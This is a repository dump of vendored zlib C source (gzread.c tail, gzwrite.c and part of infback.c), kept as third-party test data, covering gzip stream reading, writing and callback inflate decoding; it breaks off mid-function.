(serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* try output buffer (no need to check for skip request) */ if (state->x.have) { state->x.have--; state->x.pos++; return *(state->x.next)++; } /* nothing there -- try gz_read() */ return gz_read(state, buf, 1) < 1 ? -1 : buf[0]; } int ZEXPORT gzgetc_(gzFile file) { return gzgetc(file); } /* -- see zlib.h -- */ int ZEXPORT gzungetc(int c, gzFile file) { gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* in case this was just opened, set up the input buffer */ if (state->mode == GZ_READ && state->how == LOOK && state->x.have == 0) (void)gz_look(state); /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* process a skip request */ if (state->seek) { state->seek = 0; if (gz_skip(state, state->skip) == -1) return -1; } /* can't push EOF */ if (c < 0) return -1; /* if output buffer empty, put byte at end (allows more pushing) */ if (state->x.have == 0) { state->x.have = 1; state->x.next = state->out + (state->size << 1) - 1; state->x.next[0] = (unsigned char)c; state->x.pos--; state->past = 0; return c; } /* if no room, give up (must have already done a gzungetc()) */ if (state->x.have == (state->size << 1)) { gz_error(state, Z_DATA_ERROR, "out of room to push characters"); return -1; } /* slide output data if needed and insert byte before existing data */ if (state->x.next == state->out) { unsigned char *src = state->out + state->x.have; unsigned char *dest = state->out + (state->size << 1); while (src > state->out) *--dest = *--src; state->x.next = dest; } state->x.have++; state->x.next--; state->x.next[0] = (unsigned char)c; state->x.pos--; state->past = 0; return c; } /* -- see zlib.h -- */ char * ZEXPORT gzgets(gzFile file, char *buf, int len) { unsigned left, n; char *str; unsigned char *eol; gz_statep state; /* check parameters and get internal structure */ if (file == NULL || buf == NULL || len < 1) return NULL; state = (gz_statep)file; /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return NULL; /* process a skip request */ if (state->seek) { state->seek = 0; if (gz_skip(state, state->skip) == -1) return NULL; } /* copy output bytes up to new line or len - 1, whichever comes first -- append a terminating zero to the string (we don't check for a zero in the contents, let the user worry about that) */ str = buf; left = (unsigned)len - 1; if (left) do { /* assure that something is in the output buffer */ if (state->x.have == 0 && gz_fetch(state) == -1) return NULL; /* error */ if (state->x.have == 0) { /* end of file */ state->past = 1; /* read past end */ break; /* return what we have */ } /* look for end-of-line in current output buffer */ n = state->x.have > left ? left : state->x.have; eol = (unsigned char *)memchr(state->x.next, '\n', n); if (eol != NULL) n = (unsigned)(eol - state->x.next) + 1; /* copy through end-of-line, or remainder if not found */ memcpy(buf, state->x.next, n); state->x.have -= n; state->x.next += n; state->x.pos += n; left -= n; buf += n; } while (left && eol == NULL); /* return terminated string, or if nothing, end of file */ if (buf == str) return NULL; buf[0] = 0; return str; } /* -- see zlib.h -- */ int ZEXPORT gzdirect(gzFile file) { gz_statep state; /* get internal structure */ if (file == NULL) return 0; state = (gz_statep)file; /* if the state is not known, but we can find out, then do so (this is mainly for right after a gzopen() or gzdopen()) */ if (state->mode == GZ_READ && state->how == LOOK && state->x.have == 0) (void)gz_look(state); /* return 1 if transparent, 0 if processing a gzip stream */ return state->direct; } /* -- see zlib.h -- */ int ZEXPORT gzclose_r(gzFile file) { int ret, err; gz_statep state; /* get internal structure */ if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; /* check that we're reading */ if (state->mode != GZ_READ) return Z_STREAM_ERROR; /* free memory and close file */ if (state->size) { inflateEnd(&(state->strm)); free(state->out); free(state->in); } err = state->err == Z_BUF_ERROR ? Z_BUF_ERROR : Z_OK; gz_error(state, Z_OK, NULL); free(state->path); ret = close(state->fd); free(state); return ret ? Z_ERRNO : err; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzwrite.c ================================================ /* gzwrite.c -- zlib functions for writing gzip files * Copyright (C) 2004-2019 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" /* Initialize state for writing a gzip file. Mark initialization by setting state->size to non-zero. Return -1 on a memory allocation failure, or 0 on success. */ local int gz_init(gz_statep state) { int ret; z_streamp strm = &(state->strm); /* allocate input buffer (double size for gzprintf) */ state->in = (unsigned char *)malloc(state->want << 1); if (state->in == NULL) { gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } /* only need output buffer and deflate state if compressing */ if (!state->direct) { /* allocate output buffer */ state->out = (unsigned char *)malloc(state->want); if (state->out == NULL) { free(state->in); gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } /* allocate deflate memory, set up for gzip compression */ strm->zalloc = Z_NULL; strm->zfree = Z_NULL; strm->opaque = Z_NULL; ret = deflateInit2(strm, state->level, Z_DEFLATED, MAX_WBITS + 16, DEF_MEM_LEVEL, state->strategy); if (ret != Z_OK) { free(state->out); free(state->in); gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } strm->next_in = NULL; } /* mark state as initialized */ state->size = state->want; /* initialize write buffer if compressing */ if (!state->direct) { strm->avail_out = state->size; strm->next_out = state->out; state->x.next = strm->next_out; } return 0; } /* Compress whatever is at avail_in and next_in and write to the output file. Return -1 if there is an error writing to the output file or if gz_init() fails to allocate memory, otherwise 0. flush is assumed to be a valid deflate() flush value. If flush is Z_FINISH, then the deflate() state is reset to start a new gzip stream. If gz->direct is true, then simply write to the output file without compressing, and ignore flush. */ local int gz_comp(gz_statep state, int flush) { int ret, writ; unsigned have, put, max = ((unsigned)-1 >> 2) + 1; z_streamp strm = &(state->strm); /* allocate memory if this is the first time through */ if (state->size == 0 && gz_init(state) == -1) return -1; /* write directly if requested */ if (state->direct) { while (strm->avail_in) { put = strm->avail_in > max ? max : strm->avail_in; writ = write(state->fd, strm->next_in, put); if (writ < 0) { gz_error(state, Z_ERRNO, zstrerror()); return -1; } strm->avail_in -= (unsigned)writ; strm->next_in += writ; } return 0; } /* check for a pending reset */ if (state->reset) { /* don't start a new gzip member unless there is data to write */ if (strm->avail_in == 0) return 0; deflateReset(strm); state->reset = 0; } /* run deflate() on provided input until it produces no more output */ ret = Z_OK; do { /* write out current buffer contents if full, or if flushing, but if doing Z_FINISH then don't write until we get to Z_STREAM_END */ if (strm->avail_out == 0 || (flush != Z_NO_FLUSH && (flush != Z_FINISH || ret == Z_STREAM_END))) { while (strm->next_out > state->x.next) { put = strm->next_out - state->x.next > (int)max ? max : (unsigned)(strm->next_out - state->x.next); writ = write(state->fd, state->x.next, put); if (writ < 0) { gz_error(state, Z_ERRNO, zstrerror()); return -1; } state->x.next += writ; } if (strm->avail_out == 0) { strm->avail_out = state->size; strm->next_out = state->out; state->x.next = state->out; } } /* compress */ have = strm->avail_out; ret = deflate(strm, flush); if (ret == Z_STREAM_ERROR) { gz_error(state, Z_STREAM_ERROR, "internal error: deflate stream corrupt"); return -1; } have -= strm->avail_out; } while (have); /* if that completed a deflate stream, allow another to start */ if (flush == Z_FINISH) state->reset = 1; /* all done, no errors */ return 0; } /* Compress len zeros to output. Return -1 on a write error or memory allocation failure by gz_comp(), or 0 on success. */ local int gz_zero(gz_statep state, z_off64_t len) { int first; unsigned n; z_streamp strm = &(state->strm); /* consume whatever's left in the input buffer */ if (strm->avail_in && gz_comp(state, Z_NO_FLUSH) == -1) return -1; /* compress len zeros (len guaranteed > 0) */ first = 1; while (len) { n = GT_OFF(state->size) || (z_off64_t)state->size > len ? (unsigned)len : state->size; if (first) { memset(state->in, 0, n); first = 0; } strm->avail_in = n; strm->next_in = state->in; state->x.pos += n; if (gz_comp(state, Z_NO_FLUSH) == -1) return -1; len -= n; } return 0; } /* Write len bytes from buf to file. Return the number of bytes written. If the returned value is less than len, then there was an error. */ local z_size_t gz_write(gz_statep state, voidpc buf, z_size_t len) { z_size_t put = len; /* if len is zero, avoid unnecessary operations */ if (len == 0) return 0; /* allocate memory if this is the first time through */ if (state->size == 0 && gz_init(state) == -1) return 0; /* check for seek request */ if (state->seek) { state->seek = 0; if (gz_zero(state, state->skip) == -1) return 0; } /* for small len, copy to input buffer, otherwise compress directly */ if (len < state->size) { /* copy to input buffer, compress when full */ do { unsigned have, copy; if (state->strm.avail_in == 0) state->strm.next_in = state->in; have = (unsigned)((state->strm.next_in + state->strm.avail_in) - state->in); copy = state->size - have; if (copy > len) copy = (unsigned)len; memcpy(state->in + have, buf, copy); state->strm.avail_in += copy; state->x.pos += copy; buf = (const char *)buf + copy; len -= copy; if (len && gz_comp(state, Z_NO_FLUSH) == -1) return 0; } while (len); } else { /* consume whatever's left in the input buffer */ if (state->strm.avail_in && gz_comp(state, Z_NO_FLUSH) == -1) return 0; /* directly compress user buffer to file */ state->strm.next_in = (z_const Bytef *)buf; do { unsigned n = (unsigned)-1; if (n > len) n = (unsigned)len; state->strm.avail_in = n; state->x.pos += n; if (gz_comp(state, Z_NO_FLUSH) == -1) return 0; len -= n; } while (len); } /* input was all buffered or compressed */ return put; } /* -- see zlib.h -- */ int ZEXPORT gzwrite(gzFile file, voidpc buf, unsigned len) { gz_statep state; /* get internal structure */ if (file == NULL) return 0; state = (gz_statep)file; /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK) return 0; /* since an int is returned, make sure len fits in one, otherwise return with an error (this avoids a flaw in the interface) */ if ((int)len < 0) { gz_error(state, Z_DATA_ERROR, "requested length does not fit in int"); return 0; } /* write len bytes from buf (the return value will fit in an int) */ return (int)gz_write(state, buf, len); } /* -- see zlib.h -- */ z_size_t ZEXPORT gzfwrite(voidpc buf, z_size_t size, z_size_t nitems, gzFile file) { z_size_t len; gz_statep state; /* get internal structure */ if (file == NULL) return 0; state = (gz_statep)file; /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK) return 0; /* compute bytes to read -- error on overflow */ len = nitems * size; if (size && len / size != nitems) { gz_error(state, Z_STREAM_ERROR, "request does not fit in a size_t"); return 0; } /* write len bytes to buf, return the number of full items written */ return len ? gz_write(state, buf, len) / size : 0; } /* -- see zlib.h -- */ int ZEXPORT gzputc(gzFile file, int c) { unsigned have; unsigned char buf[1]; gz_statep state; z_streamp strm; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; strm = &(state->strm); /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK) return -1; /* check for seek request */ if (state->seek) { state->seek = 0; if (gz_zero(state, state->skip) == -1) return -1; } /* try writing to input buffer for speed (state->size == 0 if buffer not initialized) */ if (state->size) { if (strm->avail_in == 0) strm->next_in = state->in; have = (unsigned)((strm->next_in + strm->avail_in) - state->in); if (have < state->size) { state->in[have] = (unsigned char)c; strm->avail_in++; state->x.pos++; return c & 0xff; } } /* no room in buffer or not initialized, use gz_write() */ buf[0] = (unsigned char)c; if (gz_write(state, buf, 1) != 1) return -1; return c & 0xff; } /* -- see zlib.h -- */ int ZEXPORT gzputs(gzFile file, const char *s) { z_size_t len, put; gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK) return -1; /* write string */ len = strlen(s); if ((int)len < 0 || (unsigned)len != len) { gz_error(state, Z_STREAM_ERROR, "string length does not fit in int"); return -1; } put = gz_write(state, s, len); return put < len ? -1 : (int)len; } #if defined(STDC) || defined(Z_HAVE_STDARG_H) #include /* -- see zlib.h -- */ int ZEXPORTVA gzvprintf(gzFile file, const char *format, va_list va) { int len; unsigned left; char *next; gz_statep state; z_streamp strm; /* get internal structure */ if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; strm = &(state->strm); /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK) return Z_STREAM_ERROR; /* make sure we have some buffer space */ if (state->size == 0 && gz_init(state) == -1) return state->err; /* check for seek request */ if (state->seek) { state->seek = 0; if (gz_zero(state, state->skip) == -1) return state->err; } /* do the printf() into the input buffer, put length in len -- the input buffer is double-sized just for this function, so there is guaranteed to be state->size bytes available after the current contents */ if (strm->avail_in == 0) strm->next_in = state->in; next = (char *)(state->in + (strm->next_in - state->in) + strm->avail_in); next[state->size - 1] = 0; #ifdef NO_vsnprintf # ifdef HAS_vsprintf_void (void)vsprintf(next, format, va); for (len = 0; len < state->size; len++) if (next[len] == 0) break; # else len = vsprintf(next, format, va); # endif #else # ifdef HAS_vsnprintf_void (void)vsnprintf(next, state->size, format, va); len = strlen(next); # else len = vsnprintf(next, state->size, format, va); # endif #endif /* check that printf() results fit in buffer */ if (len == 0 || (unsigned)len >= state->size || next[state->size - 1] != 0) return 0; /* update buffer and position, compress first half if past that */ strm->avail_in += (unsigned)len; state->x.pos += len; if (strm->avail_in >= state->size) { left = strm->avail_in - state->size; strm->avail_in = state->size; if (gz_comp(state, Z_NO_FLUSH) == -1) return state->err; memmove(state->in, state->in + state->size, left); strm->next_in = state->in; strm->avail_in = left; } return len; } int ZEXPORTVA gzprintf(gzFile file, const char *format, ...) { va_list va; int ret; va_start(va, format); ret = gzvprintf(file, format, va); va_end(va); return ret; } #else /* !STDC && !Z_HAVE_STDARG_H */ /* -- see zlib.h -- */ int ZEXPORTVA gzprintf(gzFile file, const char *format, int a1, int a2, int a3, int a4, int a5, int a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13, int a14, int a15, int a16, int a17, int a18, int a19, int a20) { unsigned len, left; char *next; gz_statep state; z_streamp strm; /* get internal structure */ if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; strm = &(state->strm); /* check that can really pass pointer in ints */ if (sizeof(int) != sizeof(void *)) return Z_STREAM_ERROR; /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK) return Z_STREAM_ERROR; /* make sure we have some buffer space */ if (state->size == 0 && gz_init(state) == -1) return state->error; /* check for seek request */ if (state->seek) { state->seek = 0; if (gz_zero(state, state->skip) == -1) return state->error; } /* do the printf() into the input buffer, put length in len -- the input buffer is double-sized just for this function, so there is guaranteed to be state->size bytes available after the current contents */ if (strm->avail_in == 0) strm->next_in = state->in; next = (char *)(strm->next_in + strm->avail_in); next[state->size - 1] = 0; #ifdef NO_snprintf # ifdef HAS_sprintf_void sprintf(next, format, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20); for (len = 0; len < size; len++) if (next[len] == 0) break; # else len = sprintf(next, format, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20); # endif #else # ifdef HAS_snprintf_void snprintf(next, state->size, format, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20); len = strlen(next); # else len = snprintf(next, state->size, format, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20); # endif #endif /* check that printf() results fit in buffer */ if (len == 0 || len >= state->size || next[state->size - 1] != 0) return 0; /* update buffer and position, compress first half if past that */ strm->avail_in += len; state->x.pos += len; if (strm->avail_in >= state->size) { left = strm->avail_in - state->size; strm->avail_in = state->size; if (gz_comp(state, Z_NO_FLUSH) == -1) return state->err; memmove(state->in, state->in + state->size, left); strm->next_in = state->in; strm->avail_in = left; } return (int)len; } #endif /* -- see zlib.h -- */ int ZEXPORT gzflush(gzFile file, int flush) { gz_statep state; /* get internal structure */ if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK) return Z_STREAM_ERROR; /* check flush parameter */ if (flush < 0 || flush > Z_FINISH) return Z_STREAM_ERROR; /* check for seek request */ if (state->seek) { state->seek = 0; if (gz_zero(state, state->skip) == -1) return state->err; } /* compress remaining data with requested flush */ (void)gz_comp(state, flush); return state->err; } /* -- see zlib.h -- */ int ZEXPORT gzsetparams(gzFile file, int level, int strategy) { gz_statep state; z_streamp strm; /* get internal structure */ if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; strm = &(state->strm); /* check that we're writing and that there's no error */ if (state->mode != GZ_WRITE || state->err != Z_OK || state->direct) return Z_STREAM_ERROR; /* if no change is requested, then do nothing */ if (level == state->level && strategy == state->strategy) return Z_OK; /* check for seek request */ if (state->seek) { state->seek = 0; if (gz_zero(state, state->skip) == -1) return state->err; } /* change compression parameters for subsequent input */ if (state->size) { /* flush previous input with previous parameters before changing */ if (strm->avail_in && gz_comp(state, Z_BLOCK) == -1) return state->err; deflateParams(strm, level, strategy); } state->level = level; state->strategy = strategy; return Z_OK; } /* -- see zlib.h -- */ int ZEXPORT gzclose_w(gzFile file) { int ret = Z_OK; gz_statep state; /* get internal structure */ if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; /* check that we're writing */ if (state->mode != GZ_WRITE) return Z_STREAM_ERROR; /* check for seek request */ if (state->seek) { state->seek = 0; if (gz_zero(state, state->skip) == -1) ret = state->err; } /* flush, free memory, and close file */ if (gz_comp(state, Z_FINISH) == -1) ret = state->err; if (state->size) { if (!state->direct) { (void)deflateEnd(&(state->strm)); free(state->out); } free(state->in); } gz_error(state, Z_OK, NULL); free(state->path); if (close(state->fd) == -1) ret = Z_ERRNO; free(state); return ret; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/infback.c ================================================ /* infback.c -- inflate using a call-back interface * Copyright (C) 1995-2022 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* This code is largely copied from inflate.c. Normally either infback.o or inflate.o would be linked into an application--not both. The interface with inffast.c is retained so that optimized assembler-coded versions of inflate_fast() can be used with either inflate.c or infback.c. */ #include "zutil.h" #include "inftrees.h" #include "inflate.h" #include "inffast.h" /* strm provides memory allocation functions in zalloc and zfree, or Z_NULL to use the library memory allocation functions. windowBits is in the range 8..15, and window is a user-supplied window and output buffer that is 2**windowBits bytes. */ int ZEXPORT inflateBackInit_(z_streamp strm, int windowBits, unsigned char FAR *window, const char *version, int stream_size) { struct inflate_state FAR *state; if (version == Z_NULL || version[0] != ZLIB_VERSION[0] || stream_size != (int)(sizeof(z_stream))) return Z_VERSION_ERROR; if (strm == Z_NULL || window == Z_NULL || windowBits < 8 || windowBits > 15) return Z_STREAM_ERROR; strm->msg = Z_NULL; /* in case we return an error */ if (strm->zalloc == (alloc_func)0) { #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zalloc = zcalloc; strm->opaque = (voidpf)0; #endif } if (strm->zfree == (free_func)0) #ifdef Z_SOLO return Z_STREAM_ERROR; #else strm->zfree = zcfree; #endif state = (struct inflate_state FAR *)ZALLOC(strm, 1, sizeof(struct inflate_state)); if (state == Z_NULL) return Z_MEM_ERROR; Tracev((stderr, "inflate: allocated\n")); strm->state = (struct internal_state FAR *)state; state->dmax = 32768U; state->wbits = (uInt)windowBits; state->wsize = 1U << windowBits; state->window = window; state->wnext = 0; state->whave = 0; state->sane = 1; return Z_OK; } /* Return state with length and distance decoding tables and index sizes set to fixed code decoding. Normally this returns fixed tables from inffixed.h. If BUILDFIXED is defined, then instead this routine builds the tables the first time it's called, and returns those tables the first time and thereafter. This reduces the size of the code by about 2K bytes, in exchange for a little execution time. However, BUILDFIXED should not be used for threaded applications, since the rewriting of the tables and virgin may not be thread-safe. */ local void fixedtables(struct inflate_state FAR *state) { #ifdef BUILDFIXED static int virgin = 1; static code *lenfix, *distfix; static code fixed[544]; /* build fixed huffman tables if first call (may not be thread safe) */ if (virgin) { unsigned sym, bits; static code *next; /* literal/length table */ sym = 0; while (sym < 144) state->lens[sym++] = 8; while (sym < 256) state->lens[sym++] = 9; while (sym < 280) state->lens[sym++] = 7; while (sym < 288) state->lens[sym++] = 8; next = fixed; lenfix = next; bits = 9; inflate_table(LENS, state->lens, 288, &(next), &(bits), state->work); /* distance table */ sym = 0; while (sym < 32) state->lens[sym++] = 5; distfix = next; bits = 5; inflate_table(DISTS, state->lens, 32, &(next), &(bits), state->work); /* do this just once */ virgin = 0; } #else /* !BUILDFIXED */ # include "inffixed.h" #endif /* BUILDFIXED */ state->lencode = lenfix; state->lenbits = 9; state->distcode = distfix; state->distbits = 5; } /* Macros for inflateBack(): */ /* Load returned state from inflate_fast() */ #define LOAD() \ do { \ put = strm->next_out; \ left = strm->avail_out; \ next = strm->next_in; \ have = strm->avail_in; \ hold = state->hold; \ bits = state->bits; \ } while (0) /* Set state from registers for inflate_fast() */ #define RESTORE() \ do { \ strm->next_out = put; \ strm->avail_out = left; \ strm->next_in = next; \ strm->avail_in = have; \ state->hold = hold; \ state->bits = bits; \ } while (0) /* Clear the input bit accumulator */ #define INITBITS() \ do { \ hold = 0; \ bits = 0; \ } while (0) /* Assure that some input is available. If input is requested, but denied, then return a Z_BUF_ERROR from inflateBack(). */ #define PULL() \ do { \ if (have == 0) { \ have = in(in_desc, &next); \ if (have == 0) { \ next = Z_NULL; \ ret = Z_BUF_ERROR; \ goto inf_leave; \ } \ } \ } while (0) /* Get a byte of input into the bit accumulator, or return from inflateBack() with an error if there is no input available. */ #define PULLBYTE() \ do { \ PULL(); \ have--; \ hold += (unsigned long)(*next++) << bits; \ bits += 8; \ } while (0) /* Assure that there are at least n bits in the bit accumulator. If there is not enough available input to do that, then return from inflateBack() with an error. */ #define NEEDBITS(n) \ do { \ while (bits < (unsigned)(n)) \ PULLBYTE(); \ } while (0) /* Return the low n bits of the bit accumulator (n < 16) */ #define BITS(n) \ ((unsigned)hold & ((1U << (n)) - 1)) /* Remove n bits from the bit accumulator */ #define DROPBITS(n) \ do { \ hold >>= (n); \ bits -= (unsigned)(n); \ } while (0) /* Remove zero to seven bits as needed to go to a byte boundary */ #define BYTEBITS() \ do { \ hold >>= bits & 7; \ bits -= bits & 7; \ } while (0) /* Assure that some output space is available, by writing out the window if it's full. If the write fails, return from inflateBack() with a Z_BUF_ERROR. */ #define ROOM() \ do { \ if (left == 0) { \ put = state->window; \ left = state->wsize; \ state->whave = left; \ if (out(out_desc, put, left)) { \ ret = Z_BUF_ERROR; \ goto inf_leave; \ } \ } \ } while (0) /* strm provides the memory allocation functions and window buffer on input, and provides information on the unused input on return. For Z_DATA_ERROR returns, strm will also provide an error message. in() and out() are the call-back input and output functions. When inflateBack() needs more input, it calls in(). When inflateBack() has filled the window with output, or when it completes with data in the window, it calls out() to write out the data. The application must not change the provided input until in() is called again or inflateBack() returns. The application must not change the window/output buffer until inflateBack() returns. in() and out() are called with a descriptor parameter provided in the inflateBack() call. This parameter can be a structure that provides the information required to do the read or write, as well as accumulated information on the input and output such as totals and check values. in() should return zero on failure. out() should return non-zero on failure. If either in() or out() fails, than inflateBack() returns a Z_BUF_ERROR. strm->next_in can be checked for Z_NULL to see whether it was in() or out() that caused in the error. Otherwise, inflateBack() returns Z_STREAM_END on success, Z_DATA_ERROR for an deflate format error, or Z_MEM_ERROR if it could not allocate memory for the state. inflateBack() can also return Z_STREAM_ERROR if the input parameters are not correct, i.e. strm is Z_NULL or the state was not initialized. */ int ZEXPORT inflateBack(z_streamp strm, in_func in, void FAR *in_desc, out_func out, void FAR *out_desc) { struct inflate_state FAR *state; z_const unsigned char FAR *next; /* next input */ unsigned char FAR *put; /* next output */ unsigned have, left; /* available input and output */ unsigned long hold; /* bit buffer */ unsigned bits; /* bits in bit buffer */ unsigned copy; /* number of stored or match bytes to copy */ unsigned char FAR *from; /* where to copy match bytes from */ code here; /* current decoding table entry */ code last; /* parent table entry */ unsigned len; /* length to copy for repeats, bits to drop */ int ret; /* return code */ static const unsigned short order[19] = /* permutation of code lengths */ {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15}; /* Check that the strm exists and that the state was initialized */ if (strm == Z_NULL || strm->state == Z_NULL) return Z_STREAM_ERROR; state = (struct inflate_state FAR *)strm->state; /* Reset the state */ strm->msg = Z_NULL; state->mode = TYPE; state->last = 0; state->whave = 0; next = strm->next_in; have = next != Z_NULL ? strm->avail_in : 0; hold = 0; bits = 0; put = state->window; left = state->wsize; /* Inflate until end of block marked as last */ for (;;) switch (state->mode) { case TYPE: /* determine and dispatch block type */ if (state->last) { BYTEBITS(); state->mode = DONE; break; } NEEDBITS(3); state->last = BITS(1); DROPBITS(1); switch (BITS(2)) { case 0: /* stored block */ Tracev((stderr, "inflate: stored block%s\n", state->last ? " (last)" : "")); state->mode = STORED; break; case 1: /* fixed block */ fixedtables(state); Tracev((stderr, "inflate: fixed codes block%s\n", state->last ? " (last)" : "")); state->mode = LEN; /* decode codes */ break; case 2: /* dynamic block */ Tracev((stderr, "inflate: dynamic codes block%s\n", state->last ? " (last)" : "")); state->mode = TABLE; break; case 3: strm->msg = (char *)"invalid block type"; state->mode = BAD; } DROPBITS(2); break; case STORED: /* get and verify stored block length */ BYTEBITS(); /* go to byte boundary */ NEEDBITS(32); if ((hold & 0xffff) != ((hold >> 16) ^ 0xffff)) { strm->msg = (char *)"invalid stored block lengths"; state->mode = BAD; break; } state->length = (unsigned)hold & 0xffff; Tracev((stderr, "inflate: stored length %u\n", state->length)); INITBITS(); /* copy stored block from input to output */ while (state->length != 0) { copy = state->length; PULL(); ROOM(); if (copy > have) copy = have; if (copy > left) copy = left; zmemcpy(put, next, copy); have -= copy; next += copy; left -= copy; put += copy; state->length -= copy; } Tracev((stderr, "inflate: stored end\n")); state->mode = TYPE; break; case TABLE: /* get dynamic table entries descriptor */ NEEDBITS(14); state->nlen = BITS(5) + 257; DROPBITS(5); state->ndist = BITS(5) + 1; DROPBITS(5); state->ncode = BITS(4) + 4; DROPBITS(4); #ifndef PKZIP_BUG_WORKAROUND if (state->nlen > 286 || state->ndist > 30) { strm->msg = (char *)"too many length or distance symbols"; state->mode = BAD; break; } #endif Tracev((stderr, "inflate: table sizes ok\n")); /* get code length code lengths (not a typo) */ state->have = 0; while (state->have < state->ncode) { NEEDBITS(3); state->lens[order[state->have++]] = (unsigned short)BITS(3); DROPBITS(3); } while (state->have < 19) state->lens[order[state->have++]] = 0; state->next = state->codes; state->lencode = (code const FAR *)(state->next); state->lenbits = 7; ret = inflate_table(CODES, state->lens, 19, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid code lengths set"; state->mode = BAD; break; } Tracev((stderr, "inflate: code lengths ok\n")); /* get length and distance code code lengths */ state->have = 0; while (state->have < state->nlen + state->ndist) { for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.val < 16) { DROPBITS(here.bits); state->lens[state->have++] = here.val; } else { if (here.val == 16) { NEEDBITS(here.bits + 2); DROPBITS(here.bits); if (state->have == 0) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } len = (unsigned)(state->lens[state->have - 1]); copy = 3 + BITS(2); DROPBITS(2); } else if (here.val == 17) { NEEDBITS(here.bits + 3); DROPBITS(here.bits); len = 0; copy = 3 + BITS(3); DROPBITS(3); } else { NEEDBITS(here.bits + 7); DROPBITS(here.bits); len = 0; copy = 11 + BITS(7); DROPBITS(7); } if (state->have + copy > state->nlen + state->ndist) { strm->msg = (char *)"invalid bit length repeat"; state->mode = BAD; break; } while (copy--) state->lens[state->have++] = (unsigned short)len; } } /* handle error breaks in while */ if (state->mode == BAD) break; /* check for end-of-block code (better have one) */ if (state->lens[256] == 0) { strm->msg = (char *)"invalid code -- missing end-of-block"; state->mode = BAD; break; } /* build code tables -- note: do not change the lenbits or distbits values here (9 and 6) without reading the comments in inftrees.h concerning the ENOUGH constants, which depend on those values */ state->next = state->codes; state->lencode = (code const FAR *)(state->next); state->lenbits = 9; ret = inflate_table(LENS, state->lens, state->nlen, &(state->next), &(state->lenbits), state->work); if (ret) { strm->msg = (char *)"invalid literal/lengths set"; state->mode = BAD; break; } state->distcode = (code const FAR *)(state->next); state->distbits = 6; ret = inflate_table(DISTS, state->lens + state->nlen, state->ndist, &(state->next), &(state->distbits), state->work); if (ret) { strm->msg = (char *)"invalid distances set"; state->mode = BAD; break; } Tracev((stderr, "inflate: codes ok\n")); state->mode = LEN; /* fallthrough */ case LEN: /* use inflate_fast() if we have enough input and output */ if (have >= 6 && left >= 258) { RESTORE(); if (state->whave < state->wsize) state->whave = state->wsize - left; inflate_fast(strm, state->wsize); LOAD(); break; } /* get a literal, length, or end-of-block code */ for (;;) { here = state->lencode[BITS(state->lenbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if (here.op && (here.op & 0xf0) == 0) { last = here; for (;;) { here = state->lencode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); } DROPBITS(here.bits); state->length = (unsigned)here.val; /* process literal */ if (here.op == 0) { Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ? "inflate: literal '%c'\n" : "inflate: literal 0x%02x\n", here.val)); ROOM(); *put++ = (unsigned char)(state->length); left--; state->mode = LEN; break; } /* process end of block */ if (here.op & 32) { Tracevv((stderr, "inflate: end of block\n")); state->mode = TYPE; break; } /* invalid code */ if (here.op & 64) { strm->msg = (char *)"invalid literal/length code"; state->mode = BAD; break; } /* length code -- get extra bits, if any */ state->extra = (unsigned)(here.op) & 15; if (state->extra != 0) { NEEDBITS(state->extra); state->length += BITS(state->extra); DROPBITS(state->extra); } Tracevv((stderr, "inflate: length %u\n", state->length)); /* get distance code */ for (;;) { here = state->distcode[BITS(state->distbits)]; if ((unsigned)(here.bits) <= bits) break; PULLBYTE(); } if ((here.op & 0xf0) == 0) { last = here; for (;;) { here = state->distcode[last.val + (BITS(last.bits + last.op) >> last.bits)]; if ((unsigned)(last.bits + here.bits) <= bits) break; PULLBYTE(); } DROPBITS(last.bits); } 